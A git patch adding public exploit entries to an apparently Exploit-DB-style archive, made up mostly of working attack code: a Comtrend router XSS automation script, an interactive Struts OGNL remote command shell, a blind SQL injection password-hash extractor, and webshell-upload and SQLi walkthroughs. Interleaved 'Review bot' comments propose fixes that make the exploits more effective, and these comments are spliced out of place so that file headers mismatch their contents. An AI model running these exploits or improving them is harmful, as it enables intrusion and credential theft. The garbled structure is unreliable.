From 5aa3bfc75991dc553325ac0d60ad82554bb3ac6b Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 21 Oct 2020 05:02:11 +0000 Subject: [PATCH] DB: 2020-10-21 12 changes to exploits/shellcodes Comtrend AR-5387un router - Persistent XSS (Authenticated) Loan Management System 1.0 - Multiple Cross Site Scripting (Stored) Wordpress Plugin WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure Visitor Management System in PHP 1.0 - SQL Injection (Authenticated) Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated) WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS RiteCMS 2.2.1 - Remote Code Execution (Authenticated) Mobile Shop System v1.0 - SQL Injection Authentication Bypass Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated) --- exploits/hardware/webapps/48908.py | 274 ++++++++++++++++++++++++++++ exploits/java/webapps/48917.py | 79 ++++++++ exploits/multiple/webapps/48919.txt | 32 ++++ exploits/php/webapps/48909.txt | 22 +++ exploits/php/webapps/48910.txt | 15 ++ exploits/php/webapps/48911.txt | 41 +++++ exploits/php/webapps/48912.py | 103 +++++++++++ exploits/php/webapps/48913.txt | 67 +++++++ exploits/php/webapps/48914.txt | 27 +++ exploits/php/webapps/48915.py | 129 +++++++++++++ exploits/php/webapps/48916.txt | 45 +++++ exploits/php/webapps/48918.sh | 17 ++ files_exploits.csv | 12 ++ 13 files changed, 863 insertions(+) create mode 100755 exploits/hardware/webapps/48908.py create mode 100755 exploits/java/webapps/48917.py create mode 100644 exploits/multiple/webapps/48919.txt create mode 100644 exploits/php/webapps/48909.txt create mode 100644 exploits/php/webapps/48910.txt create mode 100644 exploits/php/webapps/48911.txt create mode 100755 exploits/php/webapps/48912.py create mode 100644 
exploits/php/webapps/48913.txt
create mode 100644 exploits/php/webapps/48914.txt
create mode 100755 exploits/php/webapps/48915.py
create mode 100644 exploits/php/webapps/48916.txt
create mode 100755 exploits/php/webapps/48918.sh
diff --git a/exploits/hardware/webapps/48908.py
new file mode 100755
index 000000000..9f5e83f07
--- /dev/null
+++ b/exploits/hardware/webapps/48908.py
@@ -0,0 +1,274 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +""" +Exploit Title: Persistent XSS on Comtrend AR-5387un router +Date: 19/10/2020 +Exploit Author: OscarAkaElvis +Vendor Homepage: https://www.comtrend.com/ +Version: Comtrend AR-5387un router +Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i +CVE: CVE-2018-8062 + +Disclosure timeline: +08/03/2018: Vulnerability was discovered +10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062) +11/03/2018: Mitre answered, CVE number reserved +11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered +16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233) +18/10/2020: Exploit creation +19/10/2020: Exploit sent to exploit-db + +Exploitation explanation: +To exploit this vulnerability, once logged into the router, a WAN service must be created +Click on "Advanced Setup", "WAN Service". "Add button", "Next" +Then insert the payload into the "Enter Service Description" field. 
This was used for the PoC +Then click on "Next" four times to go on through the steps and finally click on "Apply/Save" +The result of the XSS will be displayed and triggered on the WAN services page + +This exploit automatize the entire process bypassing CSRF protection and allowing to set a custom XSS payload +Happy hacking :) +OscarAkaElvis - https://twitter.com/OscarAkaElvis +""" + +# Dependencies and libraries +import requests +from requests.auth import HTTPBasicAuth +import re +from sys import argv, exit +import argparse +from os import path +from time import sleep + + +class Exploit(object): + + # Global class vars + session = requests.Session() + user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36" + ip = None + username = None + password = None + payload = None + default_ip = "192.168.1.1" + default_username = "admin" + default_password = "admin" + default_payload = "" + exploit_version = "1.0" + current_sessionkey = None + referer_sessionkey = None + + script_name = path.basename(argv[0]) + description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router' + epilog_text = 'Examples:\n python3 ' + script_name + ' -i 192.168.0.150\n python3 ' + script_name + ' -u admin -p mySecureRouterP@ss\n python3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'\'' + + def start_msg(self): + print("[*] Starting CVE-2018-8062 exploit...") + sleep(0.5) + + def check_params(self, arguments): + parser = argparse.ArgumentParser(description=self.description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=self.epilog_text) + parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP') + parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME') + parser.add_argument('-p', '--password', dest='password', required=False, 
help="set password to login on router", metavar='PASSWORD') + parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD') + parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit") + + args = parser.parse_args(arguments) + + self.start_msg() + + print("[*] Launch the exploit using -h argument to check all the available options") + print() + + if not args.ip: + self.ip = self.default_ip + print("[!] Warning, no ip set, default will be used: " + str(self.ip)) + else: + self.ip = args.ip + + if not args.username: + self.username = self.default_username + print("[!] Warning, no username set, default will be used: " + str(self.username)) + else: + self.username = args.username + + if not args.password: + self.password = self.default_password + print("[!] Warning, no password set, default will be used: " + str(self.password)) + else: + self.password = args.password + + if not args.payload: + self.payload = self.default_payload + print("[!] 
Warning, no XSS payload set, PoC default will be used: " + str(self.payload)) + else: + self.password = args.password + + def print_version(self): + print() + return 'v{}'.format(self.exploit_version) + + def check_router(self): + try: + print() + print("[*] Trying to detect router...") + + headers = {"User-Agent": self.user_agent} + response = self.session.get("http://" + str(self.ip) + "/", headers=headers) + + if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)): + print("[+] Comtrend router detected successfully") + else: + print() + print("[-] It seems the target is not a Comtrend router") + print("[*] Exiting...") + exit(1) + except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError): + print() + print("[-] Can't connect to the router") + print("[*] Exiting...") + exit(1) + + def check_login(self): + print() + print("[*] Trying to login...") + + headers = {"User-Agent": self.user_agent} + response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + if response.status_code != 401: + print("[+] Login successfully!") + sleep(1) + else: + print() + print("[-] Can't login into the router. Check your creds!") + print("[*] Exiting...") + exit(1) + + def get_sessionKey(self, response_text): + sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text)) + + if sessionKey is not None: + sessionKey = sessionKey.group(1) + else: + sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE) + if sessionKey is not None: + sessionKey = sessionKey.group(1) + + return sessionKey + + def step1(self): + print() + print("[*] Performing step 1/8. 
Getting initial sessionKey to bypass CSRF protection...") + + headers = {"User-Agent": self.user_agent} + response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.current_sessionkey = self.get_sessionKey(response.content) + print("[+] Success! Initial sessionKey: " + self.current_sessionkey) + sleep(1) + + def step2(self): + print() + print("[*] Performing step 2/8...") + + paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"} + response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.referer_sessionkey = self.current_sessionkey + self.current_sessionkey = self.get_sessionKey(response.content) + sleep(1) + + def step3(self): + print() + print("[*] Performing step 3/8...") + + paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey} + response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.referer_sessionkey = self.current_sessionkey + self.current_sessionkey = self.get_sessionKey(response.content) + sleep(1) + + def step4(self): + print() + print("[*] Performing step 4/8...") + + paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0", "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey} + response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", 
params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.referer_sessionkey = self.current_sessionkey + self.current_sessionkey = self.get_sessionKey(response.content) + sleep(1) + + def step5(self): + print() + print("[*] Performing step 5/8...") + + paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey, "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0", "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0", "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0", "pppAuthMethod": "0", "pppToBridge": "0"} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey} + response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.referer_sessionkey = self.current_sessionkey + self.current_sessionkey = self.get_sessionKey(response.content) + sleep(1) + + def step6(self): + print() + print("[*] Performing step 6/8...") + + paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey} + response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.referer_sessionkey = self.current_sessionkey + self.current_sessionkey = 
self.get_sessionKey(response.content) + sleep(1) + + def step7(self): + print() + print("[*] Performing step 7/8...") + + paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey} + response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + self.referer_sessionkey = self.current_sessionkey + self.current_sessionkey = self.get_sessionKey(response.content) + sleep(1) + + def final_step8(self): + print() + print("[*] Performing final step 8/8. Deploying XSS payload...") + + paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"} + headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey} + self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password)) + + print() + print("[+] XSS payload deployed successfully") + print("[+] Happy hacking :) . Author: OscarAkaElvis") + + @staticmethod + def main(self, arguments): + self.check_params(arguments) + self.check_router() + self.check_login() + self.step1() + self.step2() + self.step3() + self.step4() + self.step5() + self.step6() + self.step7() + self.final_step8() + exit(0) + + +if __name__ == '__main__': + ImportObject = Exploit() + ImportObject.main(ImportObject, argv[1:]) \ No newline at end of file diff --git a/exploits/java/webapps/48917.py b/exploits/java/webapps/48917.py new file mode 100755 index 000000000..06d3357a0 --- /dev/null +++ b/exploits/java/webapps/48917.py 
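Review bot: The `-x/--xss-payload` option is never applied: in `check_params` the else branch under `if not args.payload:` reads `self.password = args.password`, so a user-supplied payload is discarded and `default_payload` is always what `step4` sends as `serviceName`; it should be `self.payload = args.payload`. `get_sessionKey` returns `None` when neither regex matches, and `step1` then concatenates it into the success message, so a changed firmware page surfaces as a `TypeError` rather than a clear failure — guard with `if self.current_sessionkey is None: print("[-] Could not extract sessionKey"); exit(1)` before the print, and the same check is missing after steps 2–7. The script also sends the Basic-auth credentials and each per-step sessionKey over plain HTTP, which is acceptable for the LAN default but worth stating in the module docstring so nobody points it at a router across an untrusted network.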
@@ -0,0 +1,79 @@ +# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution +# Google Dork: ext:action | filetype:action +# Date: 2020/09/09 +# Exploit Author: Jonatas Fil +# Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html +# Version: <= 2.3.15 +# Tested on: Linux +# CVE : CVE-2013-2251 + +#!/usr/bin/python +# +# coding=utf-8 +# +# Struts 2 DefaultActionMapper Exploit [S2-016] +# Interactive Shell for CVE-2013-2251 +# +# The Struts 2 DefaultActionMapper supports a method for short-circuit +navigation state changes by prefixing parameters with +# "action:" or "redirect:", followed by a desired navigational target +expression. This mechanism was intended to help with +# attaching navigational information to buttons within forms. +# +# https://struts.apache.org/docs/s2-016.html +# Jonatas Fil (@exploitation) + +import requests +import sys +import readline + + +# Disable SSL +requests.packages.urllib3.disable_warnings() + +# ShellEvil +if len(sys.argv) == 2: + target = sys.argv[1] # Payload + first = target + +"?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','" + second = +"'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}" + loop = 1 + while loop == 1: + cmd = raw_input("$ ") + while cmd.strip() == '': + cmd = raw_input("$ ") + if cmd.strip() == '\q': + print("Exiting...") + sys.exit() + try: + headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"} + pwn=requests.get(first+cmd+second,headers = +headers,verify=False) # Disable SSL + if pwn.status_code == 200: + print pwn.content # 1337 + else: + print("Not 
Vuln !") + sys.exit() + except Exception,e: + print e + print("Exiting...") + sys.exit() + +else: # BANNER + print(''' + __ _ _ _ __ _ _ +/ _\ |__ ___| | | /__\_ _(_) | +\ \| '_ \ / _ \ | |/_\ \ \ / / | | +_\ \ | | | __/ | //__ \ V /| | | +\__/_| |_|\___|_|_\__/ \_/ |_|_| + + by Jonatas Fil [@explotation] +''') + print("======================================================") + print("# Struts 2 DefaultActionMapper Exploit [S2-016] #") + print("# USO: python struts.py http://site.com:8080/xxx.action #") + print("======================================================") + print("bye") + sys.exit() \ No newline at end of file diff --git a/exploits/multiple/webapps/48919.txt b/exploits/multiple/webapps/48919.txt new file mode 100644 index 000000000..050088766 --- /dev/null +++ b/exploits/multiple/webapps/48919.txt 
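Review bot: As committed the file cannot be parsed: the `first = target +`, `second =` and `headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64)` statements are split across diff lines (`+"?redirect:...`, `+"'})).start()...`, `+AppleWebKit/537.36 ...`), leaving a dangling `+`, a dangling `=` and an unterminated string literal, so Python raises `SyntaxError` before anything runs; the 79-line count in the diffstat is consistent with these being real line breaks rather than display wrapping, and the three statements need to be rejoined or wrapped in parentheses. The command typed at the prompt is concatenated into the query string unencoded, so any `&`, `#`, `%` or `+` in `cmd` is interpreted by the server as URL syntax — pass it through `urllib.quote(cmd)` (Python 2, which the `print`/`raw_input` syntax targets) before building the URL. A non-200 response is reported as "Not Vuln" and the loop exits, but a 200 whose body is an OGNL error page is printed as if it were command output, so the check should look for a marker in the body rather than the status code alone.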
@@ -0,0 +1,32 @@
+# Exploit Title: WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting Vulnerability (Authenticated)
+# Date: 10.8.2020.
+# Exploit Author: n1x_ [MS-WEB]
+# Software Homepage: https://wordpress.org/plugins/wp-colorbox/
+# Software Link (v1.1.1): https://downloads.wordpress.org/plugin/wp-colorbox.1.1.1.zip
+# Product Version: 1.1.1
+
+[Description]
+
+# WordPress Colorbox plugin is a simple lightbox tool for WordPress. It allows users to pop up content in lightbox using the popular jQuery ColorBox library.
+
+# Due to improper input santitization of "hyperlink" field, of the plugin shortcode, version v1.1.1 (and possibly previous versions), are affected by a stored XSS vulnerability.
+
+[Proof of Concept]
+
+# 1. Authorization as user with privileges to write and publish posts
+# 2. Injecting code into "hyperlink" field of the plugin shorthocode, and publishing the post
+# 3. The code is stored on the post
+
+
+[Example payloads]
+
+
+# Example payload 1: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink=""]
+
+# Example payload 2: [wp_colorbox_media url="http://www.youtube.com/embed/example" type="youtube" hyperlink=""]
+
+[Response]
+
+...
+
+...
\ No newline at end of file
diff --git a/exploits/php/webapps/48909.txt
new file mode 100644
index 000000000..1a613fafa
--- /dev/null
+++ b/exploits/php/webapps/48909.txt
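Review bot: The PoC names the required privilege only as "user with privileges to write and publish posts", which does not establish that this crosses a trust boundary: on a single-site WordPress install, Administrators and Editors typically hold the `unfiltered_html` capability and may post script markup regardless, so the finding matters only if an Author or Contributor (who lack it) can inject through the shortcode's `hyperlink` attribute. State the lowest role the PoC was verified with, e.g. `# 1. Log in as a user without the unfiltered_html capability (Author or Contributor role)`. As shown here both example payloads carry an empty `hyperlink=""` and the response section is only `...`, so the attribute-breaking value is not visible and the vector cannot be reproduced from the advisory; include the exact value used.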
@@ -0,0 +1,22 @@
+# Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)
+# Google Dork: N/A
+# Date: 2020/10/19
+# Exploit Author: Akıner Kısa
+# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip
+# Version: 1.0
+# Tested on: XAMPP
+# CVE : N/A
+
+Vulnerable Pages:
+
+http://localhost/loan/index.php?page=loans
+http://localhost/loan/index.php?page=payments
+http://localhost/loan/index.php?page=borrowers
+http://localhost/loan/index.php?page=loan_type
+
+Proof of Concept:
+
+1 - Go to vulnerable pages and using edit button (in the right, action column).
+
+2 - And fill the blanks with "" payload.
\ No newline at end of file
diff --git a/exploits/php/webapps/48910.txt
new file mode 100644
index 000000000..ba43480b7
--- /dev/null
+++ b/exploits/php/webapps/48910.txt
@@ -0,0 +1,15 @@
+# Exploit Title: WP Courses < 2.0.29 - Broken Access Controls leading to
+Courses Content Disclosure
+# Exploit Author: Stefan Broeder, Marco Ortisi (redtimmysec)
+# Authors blog: https://www.redtimmy.com
+# Vendor Homepage: https://wpcoursesplugin.com/
+# Version Vulnerable: < 2.0.29
+# CVE: (requested but not assigned yet)
+
+WP Courses plugin < 2.0.29 does not protect the courses which could be
+accessed by unauthenticated users using the REST API (/wp-jon/)
+endpoints (for example /wp-json/wp/v2/lesson/{lesson_id}) This could
+result in attackers accessing paying content without authorization.
+
+Full story here:
+https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/
\ No newline at end of file
diff --git a/exploits/php/webapps/48911.txt
new file mode 100644
index 000000000..24ba0783b
--- /dev/null
+++ b/exploits/php/webapps/48911.txt
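Review bot: The advisory does not say whether the edit forms on the four listed pages require a login or which role was used, and the payload in step 2 is shown as an empty `""`, so neither the precondition nor the vector can be reproduced from the text. Name the specific input fields on each page whose value is rendered without escaping and the account used, e.g. `2 - Log in as <role>, open the edit form and set the name/description field to an attribute-breaking payload such as "><img src=x onerror=alert(document.domain)>`. A stored XSS in a loan application is only meaningful when a lower-privileged user's input is rendered to a higher-privileged one, so the trust boundary should be explicit rather than left to the reader.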
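Review bot: `/wp-jon/` in the description is a typo for `/wp-json/` and is the only place the REST base is named before the example, so it should read `accessed by unauthenticated users using the REST API (/wp-json/)`. The entry gives no concrete check; a one-line verification such as `curl -s https://TARGET/wp-json/wp/v2/lesson/1` returning lesson content to an unauthenticated client would make the finding reproducible without following the external link. "CVE: (requested but not assigned yet)" should be updated once MITRE assigns an ID, as the entry is otherwise unsearchable by CVE.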
@@ -0,0 +1,41 @@
+# Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection
+# Exploit Author: Rahul Ramkumar
+# Date: 2020-09-16
+# Vendor Homepage: https://projectworlds.in
+# Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip
+# Version: 1.0
+# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
+# CVE: CVE-2020-25760
+# Description
+The file front.php does not perform input validation on the 'rid' paramter. An attacker can append SQL queries to the input to extract sensitive information from the database.
+Note: This exploit can work pre-authentication as well, but need to change the 302 Response to 200 using an intercept tool. It should be pretty straight forward so I have not shown how.
+
+#POC
+
+1) Navigate to the login page
+
+Example:
+
+http://192.168.1.72/visitor_management/index.php
+
+2) Enter 'username' and 'password'
+
+3) On the homepage, click on any visitor name and intercept the request
+
+4) Save the request to file. Example, visitor_management_sqli.req
+
+GET /visitor_management/front.php?rid=373568 HTTP/1.1
+Host: 192.168.1.72
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Referer: http://192.168.1.72/visitor_management/front.php
+Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef
+Upgrade-Insecure-Requests: 1
+
+5) Run SQLmap on the file,
+
+sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10
\ No newline at end of file
diff --git a/exploits/php/webapps/48912.py
new file mode 100755
index 000000000..008ad84e6
--- /dev/null
+++ b/exploits/php/webapps/48912.py
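Review bot: The note that the injection "can work pre-authentication" by changing the 302 to a 200 in an intercepting proxy is misleading as written: rewriting the response on the client side does not change what the server executed, so the claim holds only if `front.php` runs the query before issuing the redirect (sends `Location` without exiting), which the advisory should verify and state instead of leaving to the reader. If that is the case, the practical approach is to tell the tool to ignore the redirect and expect blind techniques, e.g. `sqlmap -r visitor_management_sqli.req -p rid --dbms=mysql --ignore-redirects`, since the page body is not returned to the client. The captured request also carries a live `PHPSESSID`; redact session cookies in sample requests as a matter of hygiene even for lab hosts.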
@@ -0,0 +1,103 @@ +# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage +# Date: 2020-16-09 +# Exploit Author: nag0mez +# Vendor Homepage: https://ultimatepro.codexcube.com/ +# Version: <= 2.0.5 +# Tested on: Kali Linux 2020.2 + + +# The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database. + +#!/usr/bin/env python3 +#-*- coding: utf-8 -*- +import requests +import sys + +# The original vulnerability was found on a server with an invalid SSL certificate, +# which Python could not verify. I added the verify=False parameter to avoid SSL check. +# The lack of verification results in a warning message from Python. +# To get a clean output, we will ignore all warnings. +import warnings +warnings.filterwarnings("ignore") + +host = 'https://testurl.test' # Change +url = "{}/frontend/get_article_suggestion/".format(host) + +chars = '1234567890abcdefghijklmnopqrstuvwxyz' +hex_chars = 'abcdef1234567890' + +def send_payload(payload): + try: + response = requests.post(url, data=payload, verify=False) + content = response.text + length = len(content) + return length + except Exception as e: + print('Cannot connect to host. 
Exit.') + sys.exit(1) + + +def get_first_user(): + found = True + known = '' + + while found: + + found = False + for c in chars: + test = known + c + payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)} + length = send_payload(payload) + + if length > 2: + found = True + known += c + print(c, end='') + sys.stdout.flush() + break + + return known + +def get_hash(username): + found = True + known = '' + + while found: + + found = False + for c in hex_chars: + test = known + c + payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)} + length = send_payload(payload) + + if length > 2: + found = True + known += c + print(c, end='') + sys.stdout.flush() + break + + return known + + +if __name__ == '__main__': + print('Exploit started.') + print('Guessing username...') + + username = get_first_user() + + if username != '': + print('\nUsername found: {}'.format(username)) + else: + print('\nCould not get username! Exit.') + sys.exit(1) + + print('Guessing password SHA512 hash...') + + sha = get_hash(username) + + if sha != '': + print('\nHash found: {}'.format(sha)) + else: + print('\nCould not get Hash! Exit.') + sys.exit(1) \ No newline at end of file diff --git a/exploits/php/webapps/48913.txt b/exploits/php/webapps/48913.txt new file mode 100644 index 000000000..b157ee8a3 --- /dev/null +++ b/exploits/php/webapps/48913.txt 
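Review bot: The recovery loop stops silently at the first character outside `chars`: usernames containing `_`, `-`, `.`, `@` or uppercase letters are truncated (or, with a case-insensitive MySQL collation, lowercased), and `_` and `%` are `LIKE` wildcards, so the `like'{}%'` probe cannot distinguish them even if added. Compare a fixed-length prefix with a binary equality instead, e.g. `"' or binary substring((select username from tbl_users limit 1),1,{})='{}'-- ".format(len(test), test)`, and extend `chars` with `_-.@` and uppercase. The recovered `username` is then interpolated unescaped into the second query in `get_hash`, so a name containing `'` breaks the probe; select the `password` column by the same `limit 1` position instead, or pass the name hex-encoded (`username=0x...`). `send_payload` exits on any exception, so a single transient timeout mid-loop discards all progress — catch only `requests.RequestException`, retry a bounded number of times, and keep `verify=False` flagged in the header comment as a deliberate TLS-verification bypass for the test host only.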
@@ -0,0 +1,67 @@
+# Exploit Title: WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload
+# Date: 2020-10-20
+# Exploit Author: Net-Hunter
+# Google Dork: N/A
+# Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/
+# Vendor Homepage: https://www.heliossolutions.co/
+# Tested on: Linux Apache / Wordpress 5.5.1
+# Version: 2.1
+
+
+.:: Description ::.
+An Authenticated User Can Bypass Uploader of the Plugin and Upload Arbitary File
+Because the extension of the Uploaded Flie is Checked on Client Side
+
+.:: Vulnerable File ::.
+/wp-admin/admin.php?page=hs-brand-logo-slider.php
+
+.:: Vulnerable Code ::.
+Content-Disposition: form-data; name="logoupload"; filename="a.php"
+Content-Type: image/jpeg
+
+
+.:: Proof Of Concept (Poc) ::.
+Step 1 - Log in to your account , Select hs-brand-logo-slider from the menu
+Upload
+Step 2 - Stop the upload request with burp suite
+Step 3 - Rename the file, for example a.jpg to a.php
+Step 4 - Your shell has been uploaded, showing the file path in the table
+
+.:: Sample Request::.
+
+POST /wp-admin/admin.php?page=hs-brand-logo-slider.php HTTP/1.1
+Host: 172.16.1.17:81
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://172.16.1.17:81/wp-admin/admin.php?page=hs-brand-logo-slider.php
+Content-Type: multipart/form-data; boundary=---------------------------407602771734524910834293111227
+Content-Length: 81765
+Origin: http://172.16.1.17:81
+Connection: close
+Cookie: wordpress_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C15d778148be9d49e48b6275e009642192e10b1d8a9e5e44a191141084f2618b6; wp-settings-time-2=1592045029; wp-settings-2=libraryContent%3Dbrowse%26editor%3Dtinymce; wp_learn_press_session_558570ec66c8a5729fc0bd982edbc38a=9c5476d130f39254b97895578a6cf9e2%7C%7C1603353694%7C%7Cd6957c27eda7a311e486866587a08500; wordpress_test_cookie=WP+Cookie+check; wordpress_lp_guest=fad4f6783283c86762dc8944423947d0; wordpress_logged_in_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C80d7786798b351d10cbdfe07ba50c31d2400ccbfb173d4b90255cab42791ccd7; wp-settings-time-1=1603180907
+Upgrade-Insecure-Requests: 1
+
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="brandname"
+
+aaa
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="logoupload"; filename="eftekharr.php"
+Content-Type: image/jpeg
+
+
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="logourl"
+
+http://aa.com
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="sortorder"
+
+1
+-----------------------------407602771734524910834293111227
+Content-Disposition: form-data; name="submit_data"
+
+Submit
+-----------------------------407602771734524910834293111227--
\ No newline at end of file
diff --git a/exploits/php/webapps/48914.txt
new file mode 100644
index 000000000..a7e0b124b
